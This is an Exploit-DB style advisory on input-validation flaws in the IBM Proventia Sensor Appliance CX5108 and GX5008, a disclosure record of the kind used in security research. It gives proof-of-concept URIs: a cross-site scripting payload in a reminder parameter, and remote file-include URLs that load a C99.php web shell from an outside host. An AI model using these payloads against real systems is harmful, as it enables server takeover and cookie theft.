IBM Proventia Sensor Appliance Multiple Input-Validation Vulnerabilities

vendor:

Proventia Sensor Appliance

by:

Alex Hernandez

7.5

CVSS

HIGH

Input-Validation

Unknown

CWE

Product Name: Proventia Sensor Appliance

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: Unknown

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Unknown

Unknown

IBM Proventia Sensor Appliance Multiple Input-Validation Vulnerabilities

The IBM Proventia Sensor Appliance is prone to multiple input-validation vulnerabilities, including multiple remote file-include issues and a cross-site scripting issue. An attacker can exploit these issues to steal cookie-based authentication credentials, view files, and to execute arbitrary server-side script code on an affected device in the context of the webserver process. Other attacks are also possible.

Mitigation:

Unknown

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/24864/info

The IBM Proventia Sensor Appliance is prone to multiple input-validation vulnerabilities, including multiple remote file-include issues and a cross-site scripting issue.

An attacker can exploit these issues to steal cookie-based authentication credentials, view files, and to execute arbitrary server-side script code on an affected device in the context of the webserver process. Other attacks are also possible.

IBM Proventia Sensor Appliance CX5108 and GX5008 are vulnerable. 

https://www.example.com/alert.php?reminder=-->//"><script>alert(/XSS_vulnerability_proventia_s0x by Alex Hernandez/);</script>

To exploit a remote file-include issue:

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/index.php?title=http://www.example2.com/C99.php?archive.php

https://www.example.com/main.php?page=https://www.example2.com